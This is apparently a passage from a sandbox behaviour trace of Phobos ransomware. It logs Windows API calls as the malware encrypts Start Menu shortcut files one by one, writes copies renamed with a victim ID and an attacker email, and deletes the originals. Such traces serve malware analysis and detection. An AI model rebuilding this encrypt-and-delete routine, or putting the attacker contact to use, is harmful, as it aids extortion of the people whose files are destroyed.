(hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.131] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0177.131] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0177.131] WriteFile (in: hFile=0x134, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0177.131] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.131] CloseHandle (hObject=0x188) returned 1 [0177.131] CloseHandle (hObject=0x134) returned 1 [0177.132] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Backup and Restore Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\backup and restore center.lnk")) returned 1 [0177.135] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.135] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Remote Assistance.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\remote assistance.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0177.136] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1212) returned 1 [0177.136] CloseHandle (hObject=0x134) returned 1 [0177.136] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Remote Assistance.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\remote assistance.lnk")) returned 0x20 [0177.136] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Remote Assistance.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\remote assistance.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.136] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Remote Assistance.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\remote assistance.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0177.137] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.137] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.137] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Remote Assistance.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\remote assistance.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.137] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32da8) returned 1 [0177.138] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.138] ReadFile (in: hFile=0x134, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4bc, lpOverlapped=0x0) returned 1 [0177.145] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4c0, dwBufLen=0x4c0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4c0) returned 1 [0177.145] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4c0, lpOverlapped=0x0) returned 1 [0177.146] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0177.146] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.146] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0177.146] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0177.146] WriteFile (in: hFile=0x188, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0177.146] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.146] CloseHandle (hObject=0x134) returned 1 [0177.146] CloseHandle (hObject=0x188) returned 1 [0177.146] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Remote Assistance.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\remote assistance.lnk")) returned 1 [0177.148] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.148] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Access 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft access 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.148] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2919) returned 1 [0177.148] CloseHandle (hObject=0x188) returned 1 [0177.148] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Access 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft access 2010.lnk")) returned 0x20 [0177.148] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Access 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft access 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.148] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Access 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft access 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0177.149] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.149] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.149] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Access 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft access 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0177.149] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32da8) returned 1 [0177.149] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.150] ReadFile (in: hFile=0x188, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xb67, lpOverlapped=0x0) returned 1 [0177.159] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb70, dwBufLen=0xb70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb70) returned 1 [0177.159] WriteFile (in: hFile=0x134, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xb70, lpOverlapped=0x0) returned 1 [0177.160] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0177.160] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.160] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0177.160] CryptDestroyKey (hKey=0xa32c68) returned 1 [0177.160] WriteFile (in: hFile=0x134, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0177.161] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.161] CloseHandle (hObject=0x188) returned 1 [0177.161] CloseHandle (hObject=0x134) returned 1 [0177.161] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Access 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft access 2010.lnk")) returned 1 [0177.164] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.164] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Designer 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath designer 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0177.165] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3042) returned 1 [0177.165] CloseHandle (hObject=0x194) returned 1 [0177.166] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Designer 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath designer 2010.lnk")) returned 0x20 [0177.166] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Designer 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath designer 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.166] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Designer 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath designer 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0177.166] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.166] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.166] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Designer 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath designer 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.169] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0177.169] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.169] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xbe2, lpOverlapped=0x0) returned 1 [0177.179] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbf0, dwBufLen=0xbf0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbf0) returned 1 [0177.179] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xbf0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xbf0, lpOverlapped=0x0) returned 1 [0177.180] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ce8) returned 1 [0177.180] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.180] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0177.180] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0177.180] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0177.180] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.180] CloseHandle (hObject=0x194) returned 1 [0177.180] CloseHandle (hObject=0x190) returned 1 [0177.181] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Designer 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath designer 2010.lnk")) returned 1 [0177.182] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.182] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Digital Certificate for VBA Projects.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\digital certificate for vba projects.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.183] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2977) returned 1 [0177.183] CloseHandle (hObject=0x190) returned 1 [0177.183] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Digital Certificate for VBA Projects.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\digital certificate for vba projects.lnk")) returned 0x20 [0177.183] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Digital Certificate for VBA Projects.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\digital certificate for vba projects.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.183] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Digital Certificate for VBA Projects.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\digital certificate for vba projects.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.184] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.184] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.184] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Digital Certificate for VBA Projects.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\digital certificate for vba projects.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0177.185] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0177.185] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.185] ReadFile (in: hFile=0x190, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xba1, lpOverlapped=0x0) returned 1 [0177.201] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbb0, dwBufLen=0xbb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbb0) returned 1 [0177.201] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xbb0, lpOverlapped=0x0) returned 1 [0177.202] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0177.202] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.202] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80, dwBufLen=0x80 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80) returned 1 [0177.202] CryptDestroyKey (hKey=0xa32c68) returned 1 [0177.202] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x132, lpOverlapped=0x0) returned 1 [0177.202] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.202] CloseHandle (hObject=0x190) returned 1 [0177.202] CloseHandle (hObject=0x194) returned 1 [0177.202] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Digital Certificate for VBA Projects.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\digital certificate for vba projects.lnk")) returned 1 [0177.203] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.204] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Clip Organizer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft clip organizer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.205] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2917) returned 1 [0177.205] CloseHandle (hObject=0x190) returned 1 [0177.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Clip Organizer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft clip organizer.lnk")) returned 0x20 [0177.205] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Clip Organizer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft clip organizer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.206] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Clip Organizer.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft clip organizer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.206] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.206] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.206] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Clip Organizer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft clip organizer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.207] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0177.207] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.207] ReadFile (in: hFile=0x190, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xb65, lpOverlapped=0x0) returned 1 [0177.223] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb70, dwBufLen=0xb70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb70) returned 1 [0177.223] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xb70, lpOverlapped=0x0) returned 1 [0177.223] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0177.223] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.223] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0177.223] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0177.223] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0177.224] 